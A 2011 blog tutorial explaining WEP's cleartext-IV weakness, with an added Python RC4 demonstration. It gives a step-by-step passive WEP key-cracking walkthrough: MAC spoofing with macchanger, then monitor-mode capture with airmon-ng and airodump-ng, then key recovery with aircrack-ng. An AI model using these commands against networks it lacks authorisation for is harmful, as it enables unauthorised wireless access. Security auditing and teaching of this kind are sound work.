Wednesday, January 26, 2011

802.11 WEP Wireless Hacking

Introduction to WEP and the IV vulnerability

Wired Equivalent Privacy (WEP) is a wireless security protocol, providing both encryption and authentication.

The encryption method used is RSA's RC4 stream cipher. RC4 takes a 'seed', formed by concatenating an initialization vector (IV) with the secret shared key, and from it generates a keystream that is XORed with the plaintext to produce the ciphertext.

When connecting to a WEP-secured network you are asked for the secret shared key, which is used both to authenticate clients to the network and to encrypt the traffic.

The vulnerability in the WEP protocol is that the IV is transmitted in plaintext. This allows an attacker to eavesdrop on wireless traffic and collect enough IVs to brute-force the secret shared key. Once the key is obtained the attacker uses it to connect to the target wireless network.
Note: A standard WEP implementation uses a 40 bit key and a 24 bit IV, giving a 64 bit RC4 seed (key plus IV). Because of this, WEP is sometimes referred to as 40 bit WEP or 64 bit WEP.
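To make the IV weakness concrete, here is an added example in Python (not part of the original article): plain RC4 seeded the WEP way with IV || key, a birthday-bound estimate of how soon a 24-bit IV repeats under one key, and what a passive listener learns when it does. The key, IV and frame contents are constructed sample values, and the WEP CRC-32 ICV is left out.

```python
import math

def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):                             # KSA
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || key (3 + 5 bytes for 40-bit WEP) and XORs the
    keystream over the frame; the IV itself goes on the air in the clear.
    Decryption is the same operation. The CRC-32 ICV is omitted here."""
    assert len(iv) == 3 and len(key) == 5
    return xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))

def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday-bound probability that some IV value repeats among `frames`
    frames sent under one key. A repeated IV means a reused RC4 keystream."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))

def same_iv_ciphertext_xor(iv, key, frame_a, frame_b) -> bytes:
    """What a passive listener gets from two frames carrying the same cleartext
    IV: XORing the ciphertexts cancels the keystream, leaving P_a XOR P_b,
    with no knowledge of the key at all."""
    return xor_bytes(wep_encrypt(iv, key, frame_a), wep_encrypt(iv, key, frame_b))

if __name__ == "__main__":
    key = bytes.fromhex("0123456789")   # constructed 40-bit WEP key (sample only)
    iv = bytes.fromhex("a1b2c3")        # constructed 24-bit IV
    a, b = b"GET /index.html ", b"secret-data-1234"
    print(same_iv_ciphertext_xor(iv, key, a, b) == xor_bytes(a, b))  # True
    for n in (1000, 5000, 20000):
        print(n, "frames ->", round(iv_collision_probability(n), 4))
```

The birthday figure only shows how small the 24-bit IV space is; the key-recovery step performed by aircrack-ng later in the article relies on statistical weaknesses in RC4's key scheduling rather than on exact IV repeats.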

Cracking a WEP Key

The purpose of this article is education and security auditing only. Anyone using it for any other reason is liable for their own actions.

To see this vulnerability in action and actually crack a WEP key in a test environment you need the following.
  • A test network using an 802.11 wireless router with WEP enabled and a 40 bit key configured.
  • A Linux machine with a wireless card. In this example BackTrack 4 R2 is the operating system used. Download a live DVD if you don't have a dedicated machine.
  • macchanger, airmon-ng, airodump-ng, and aircrack-ng. These tools are all included in BackTrack 4.

    The following example is a passive WEP attack that observes traffic and collects IVs. By comparison, an active attack uses packet injection to make the access point (AP) generate more traffic, and therefore more IVs, resulting in a faster crack. The passive attack takes significantly longer, depending on the traffic volume on the target network.


    Assuming the wireless interface is wlan0, disable the interface. 
    ifconfig wlan0 down

    Use macchanger to change the MAC address of the wlan0 interface. 
    macchanger --mac 00:11:22:33:44:55 wlan0

    Bring the wlan0 interface back up.
    ifconfig wlan0 up

    Use airmon-ng to create a monitor mode interface for wlan0. The new monitoring interface is called mon0.
    airmon-ng start wlan0

    Run airodump-ng to observe the target networks and note the MAC address (BSSID), channel and ESSID of the test network.
    airodump-ng mon0

    Run airodump-ng again, this time specifying the target channel, the BSSID, and the file prefix to dump the output to (replace <channel> and <target BSSID> below with the values noted in the previous step). This step is where the IVs are collected for analysis later. Again, since this is a passive attack it may take a while to collect enough IVs. Leave the machine on overnight collecting data if needed.

    airodump-ng --ivs --channel <channel> --bssid <target BSSID> -w /root/dumpfile mon0

    Keep an eye on the above command. One column is called #Data; this is the actual number of IVs collected from the network. If there is little traffic on the network this number will increase slowly. Once you have about 20,000 IVs, run the following command. airodump-ng appends a sequence number to the prefix, so with --ivs the first capture is written to /root/dumpfile-01.ivs.
    aircrack-ng /root/dumpfile-01.ivs

    aircrack-ng will report whether it has successfully cracked the WEP key or whether you need to continue collecting IVs and try again. The number of IVs needed to crack a key varies, but it can be done with fewer than 20,000 IVs.

    Enjoy.